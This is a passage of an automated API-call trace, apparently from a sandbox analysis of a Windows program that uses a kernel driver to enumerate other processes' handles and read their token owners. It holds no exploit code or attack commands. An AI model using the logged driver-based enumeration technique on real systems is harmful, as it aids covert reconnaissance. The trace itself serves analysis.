Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038885e0, HandleInformation=0x0) returned 0x0 [0245.581] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.581] PsReleaseProcessExitSynchronization () returned 0x2 [0245.581] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.581] ObQueryNameString (in: Object=0xfffffa80038885e0, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.581] ObfDereferenceObject (Object=0xfffffa80038885e0) returned 0x1 [0245.581] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.581] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.581] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0245.581] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.581] PsAcquireProcessExitSynchronization () returned 0x0 [0245.581] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.581] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034a7d10, HandleInformation=0x0) returned 0x0 [0245.581] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.581] PsReleaseProcessExitSynchronization () returned 0x2 [0245.581] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.581] ObQueryNameString (in: Object=0xfffffa80034a7d10, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.581] ObfDereferenceObject (Object=0xfffffa80034a7d10) returned 0xe [0245.581] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.581] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.581] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0245.581] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.581] PsAcquireProcessExitSynchronization () returned 0x0 [0245.581] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.581] ObReferenceObjectByHandle (in: Handle=0x1f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003945dc0, HandleInformation=0x0) returned 0x0 [0245.581] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.581] PsReleaseProcessExitSynchronization () returned 0x2 [0245.582] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.582] ObQueryNameString (in: Object=0xfffffa8003945dc0, ObjectNameInfo=0xfffffa800306c7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306c7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.582] ObfDereferenceObject (Object=0xfffffa8003945dc0) returned 0x5 [0245.582] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.582] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.582] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0245.582] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.582] PsAcquireProcessExitSynchronization () returned 0x0 [0245.582] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.582] ObReferenceObjectByHandle (in: Handle=0x260, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003995640, HandleInformation=0x0) returned 0x0 [0245.582] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.582] PsReleaseProcessExitSynchronization () returned 0x2 [0245.582] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.582] ObQueryNameString (in: Object=0xfffffa8003995640, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.582] ObfDereferenceObject (Object=0xfffffa8003995640) returned 0x1 [0245.582] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.582] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.582] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0245.582] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.582] PsAcquireProcessExitSynchronization () returned 0x0 [0245.582] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.582] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0245.582] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.582] PsReleaseProcessExitSynchronization () returned 0x2 [0245.582] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.582] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.582] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0245.582] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.583] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.583] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0245.583] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.583] PsAcquireProcessExitSynchronization () returned 0x0 [0245.583] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.583] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0245.583] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.583] PsReleaseProcessExitSynchronization () returned 0x2 [0245.583] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.583] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.583] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0245.583] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.583] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.583] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.583] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.583] PsAcquireProcessExitSynchronization () returned 0x0 [0245.583] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.583] ObReferenceObjectByHandle (in: Handle=0x45c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0245.583] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.583] PsReleaseProcessExitSynchronization () returned 0x2 [0245.583] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.583] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.583] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x9 [0245.583] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.583] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.583] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.583] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.583] PsAcquireProcessExitSynchronization () returned 0x0 [0245.583] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.584] ObReferenceObjectByHandle (in: Handle=0x4ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a669a0, HandleInformation=0x0) returned 0x0 [0245.584] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.584] PsReleaseProcessExitSynchronization () returned 0x2 [0245.584] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.584] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.584] ObfDereferenceObject (Object=0xfffffa8003a669a0) returned 0x1 [0245.584] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.584] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.584] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.584] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.584] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.584] PsAcquireProcessExitSynchronization () returned 0x0 [0245.584] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.584] ObReferenceObjectByHandle (in: Handle=0x4f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0245.584] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.584] PsReleaseProcessExitSynchronization () returned 0x2 [0245.584] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.584] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.584] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x9 [0245.584] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.584] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xc8 [0245.584] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.584] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80037fe060, HandleInformation=0x0) returned 0x0 [0245.584] ObOpenObjectByPointer (in: Object=0xfffffa80037fe060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.584] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x89 [0245.584] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.584] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.584] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.585] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.585] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.778] CloseHandle (hObject=0xc4) returned 1 [0245.778] CloseHandle (hObject=0xc8) returned 1 [0245.778] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.778] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0245.778] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.778] PsAcquireProcessExitSynchronization () returned 0x0 [0245.778] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0) [0245.778] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003822610, HandleInformation=0x0) returned 0x0 [0245.778] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.778] PsReleaseProcessExitSynchronization () returned 0x2 [0245.778] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0245.778] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.778] ObfDereferenceObject (Object=0xfffffa8003822610) returned 0x1 [0245.778] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.778] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.779] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.779] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.779] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.779] PsAcquireProcessExitSynchronization () returned 0x0 [0245.779] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0) [0245.779] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037e8730, HandleInformation=0x0) returned 0x0 [0245.779] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.779] PsReleaseProcessExitSynchronization () returned 0x2 [0245.779] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0245.779] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.779] ObfDereferenceObject (Object=0xfffffa80037e8730) returned 0x1 [0245.779] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.779] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.779] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.779] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.779] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.779] PsAcquireProcessExitSynchronization () returned 0x0 [0245.779] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0) [0245.779] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.779] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.779] PsReleaseProcessExitSynchronization () returned 0x2 [0245.779] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0245.779] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.779] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.779] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.780] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.780] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.780] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0245.780] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.780] PsAcquireProcessExitSynchronization () returned 0x0 [0245.780] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0) [0245.780] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0245.780] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.780] PsReleaseProcessExitSynchronization () returned 0x2 [0245.780] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0245.780] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.780] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0245.780] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.780] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.780] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.780] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0245.780] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.780] PsAcquireProcessExitSynchronization () returned 0x0 [0245.780] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0) [0245.780] ObReferenceObjectByHandle (in: Handle=0x100, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0245.780] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.780] PsReleaseProcessExitSynchronization () returned 0x2 [0245.780] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0245.780] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.780] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0245.780] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.781] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.781] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.781] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x22, lpOverlapped=0x0) returned 1 [0245.781] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.781] PsAcquireProcessExitSynchronization () returned 0x0 [0245.781] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0) [0245.781] ObReferenceObjectByHandle (in: 